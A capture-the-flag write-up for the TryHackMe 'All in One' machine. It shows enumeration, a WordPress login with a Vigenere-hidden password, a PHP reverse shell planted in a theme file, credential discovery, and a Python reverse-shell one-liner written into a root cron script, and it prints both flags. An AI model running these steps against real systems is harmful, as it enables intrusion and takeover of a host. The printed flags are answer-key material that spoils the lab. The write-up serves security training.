TryHackMe-All-in-One
Initial foothold
Nmap reveals 3 open ports:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.50.72 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP
The FTP service allows anonymous access but contains nothing.
kali@kali:/data/All_in_One$ ftp 10.10.244.196 Connected to 10.10.244.196. 220 (vsFTPd 3.0.3) Name (10.10.244.196:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 2020 . drwxr-xr-x 2 0 115 4096 Oct 06 2020 .. 226 Directory send OK. ftp> 221 Goodbye.
Web
Web enumeration
Enumerating the web server reveals 2 interesting locations:
kali@kali:/data/vpn$ gobuster dir -u http://10.10.244.196 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.244.196 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/04/27 15:44:13 Starting gobuster =============================================================== /wordpress (Status: 301) /hackathons (Status: 200) /server-status (Status: 403)
Hackathons
This page contains an encrypted string hidden in a comment:
kali@kali:/data/vpn$ curl http://10.10.244.196/hackathons <html> <body> <h1>Damn how much I hate the smell of <i>Vinegar </i> :/ !!! </h1> [REDACTED] <!-- Dvc W@iyur@123 --> <!-- KeepGoing --> </body> </html>
The string is encrypted using Vigenere, with the key KeepGoing
. We can decrypt the string using this site:
- Encrypted string:
Dvc W@iyur@123
- Key:
KeepGoing
- Decrypted string:
Try H@ckme@123
Wordpress
A wordpress installation is available under the /wordpress
directory. Let’s enumerate the users with wpscan
:
kali@kali:/data/All_in_One$ wpscan --url http://10.10.244.196/wordpress/ -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.7 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.244.196/wordpress/ [10.10.244.196] [+] Started: Tue Apr 27 15:34:00 2021 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.244.196/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] WordPress readme found: http://10.10.244.196/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://10.10.244.196/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.244.196/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01). | Found By: Rss Generator (Passive Detection) | - http://10.10.244.196/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator> | - http://10.10.244.196/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator> [+] WordPress theme in use: twentytwenty | Location: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/ | Last Updated: 2021-03-09T00:00:00.000Z | Readme: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 1.7 | Style URL: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:03 <=======================================> (10 / 10) 100.00% Time: 00:00:03 [i] User(s) Identified: [+] elyana | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue Apr 27 15:34:07 2021 [+] Requests Done: 23 [+] Cached Requests: 34 [+] Data Sent: 5.951 KB [+] Data Received: 51.858 KB [+] Memory used: 201.918 MB [+] Elapsed time: 00:00:07
I tried to login as elyana
with the password Try H@ckme@123
but it failed. I then tried with the password H@ckme@123
and it worked.
Reverse shell
Now connected with admin privileges, edit the 404.php
page of the twentytwenty template (http://10.10.244.196/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty) and replace all the code with a PHP reverse shell.
Click on the update button to apply the changes, open a listener (rlwrap nc -nlvp 4444
) and browse http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/404.php.
You should now have a reverse shell.
kali@kali:/data/vpn$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46330 Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 17:48:29 up 1:49, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty;pty.spawn('/bin/bash')" bash-4.4$
User flag
We find the user.txt
file in elyana
’s home folder, but we don’t have enough permissions to read the file.
bash-4.4$ cd /home cd /home bash-4.4$ ls -la ls -la total 12 drwxr-xr-x 3 root root 4096 Oct 5 2020 . drwxr-xr-x 24 root root 4096 Oct 5 2020 .. drwxr-xr-x 6 elyana elyana 4096 Oct 7 2020 elyana bash-4.4$ cd elyana cd elyana bash-4.4$ ls -la ls -la total 48 drwxr-xr-x 6 elyana elyana 4096 Oct 7 2020 . drwxr-xr-x 3 root root 4096 Oct 5 2020 .. -rw------- 1 elyana elyana 1632 Oct 7 2020 .bash_history -rw-r--r-- 1 elyana elyana 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 elyana elyana 3771 Apr 4 2018 .bashrc drwx------ 2 elyana elyana 4096 Oct 5 2020 .cache drwxr-x--- 3 root root 4096 Oct 5 2020 .config drwx------ 3 elyana elyana 4096 Oct 5 2020 .gnupg drwxrwxr-x 3 elyana elyana 4096 Oct 5 2020 .local -rw-r--r-- 1 elyana elyana 807 Apr 4 2018 .profile -rw-r--r-- 1 elyana elyana 0 Oct 5 2020 .sudo_as_admin_successful -rw-rw-r-- 1 elyana elyana 59 Oct 6 2020 hint.txt -rw------- 1 elyana elyana 61 Oct 6 2020 user.txt bash-4.4$ cat user.txt cat user.txt cat: user.txt: Permission denied
There is a hint that tells us the password may be hidden in the system:
bash-4.4$ cat hint.txt cat hint.txt Elyana's user password is hidden in the system. Find it ;)
Enumerating files owned by the user highlights an interesting file (private.txt
) in /etc/mysql/conf.d
:
bash-4.4$ find / -user elyana -type f 2>/dev/null find / -user elyana -type f 2>/dev/null /home/elyana/user.txt /home/elyana/.bash_logout /home/elyana/hint.txt /home/elyana/.bash_history /home/elyana/.profile /home/elyana/.sudo_as_admin_successful /home/elyana/.bashrc /etc/mysql/conf.d/private.txt bash-4.4$ cat /etc/mysql/conf.d/private.txt cat /etc/mysql/conf.d/private.txt user: elyana password: E@syR18ght
Now that we have elyana
’s password, we no longer need the reverse shell and we can connect via SSH directly:
kali@kali:/data/All_in_One$ sshpass -p "E@syR18ght" ssh [email protected] -bash-4.4$ cat user.txt VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259 -bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}
User flag: THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}
Root flag
Checking the crontab reveals a script (/var/backups/script.sh
) executed by root
every minute:
-bash-4.4$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root /var/backups/script.sh
And the script is world-writable:
bash-4.4$ ls -l /var/backups/script.sh ls -l /var/backups/script.sh -rwxrwxrwx 1 root root 73 Oct 7 2020 /var/backups/script.sh
Let’s modify it as follows:
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Now, start a listener and wait a minute to get a root shell:
kali@kali:/data/src$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344 bash: cannot set terminal process group (2639): Inappropriate ioctl for device bash: no job control in this shell root@elyana:~# cd /root cd /root root@elyana:~# cat root.txt cat root.txt VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9 root@elyana:~# cat root.txt | base64 -d cat root.txt | base64 -d THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}
Root flag: THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}